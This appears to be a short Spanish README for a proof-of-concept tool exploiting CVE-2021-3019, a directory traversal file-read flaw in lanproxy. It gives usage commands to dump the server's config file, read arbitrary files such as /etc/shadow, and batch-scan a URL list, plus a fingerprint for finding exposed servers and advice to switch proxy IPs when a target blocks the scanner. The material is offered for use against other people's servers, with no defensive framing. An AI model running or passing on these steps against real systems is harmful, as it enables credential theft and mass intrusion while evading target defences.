
CVE-2021-3019 lanproxy POC de detección de vulnerabilidad de lectura arbitraria de archivos por traversal de directorios
CVE-2021-3019 Vulnerabilidad de lectura de archivos arbitrarios y directory traversal en lanproxy

git clone https://github.com/FanqXu/CVE-2021-3019.git
cd CVE-2021-3019
Al ejecutarlo sin argumentos muestra la información de ayuda.

Realiza la detección de vulnerabilidad en una sola URL. Si existe la vulnerabilidad, por defecto lee el archivo de configuración y lo muestra.
python3 POC.py -u http://127.0.0.1:9100

Usa el parámetro -r para leer otros archivos del sistema. Se necesita la ruta absoluta del archivo.
python3 POC.py -u http://127.0.0.1:9100 -r /etc/shadow

Usa el parámetro -f para escanear en lote. Las vulnerables se escribirán en el archivo success.txt.
python3 POC.py -f urls.txt

"Server: LPS-0.1" && title=="Iniciar sesión"
Cuando aparece Connection reset by peer, es muy probable que la IP haya sido bloqueada por el servidor objetivo. Simplemente cambia a una IP proxy.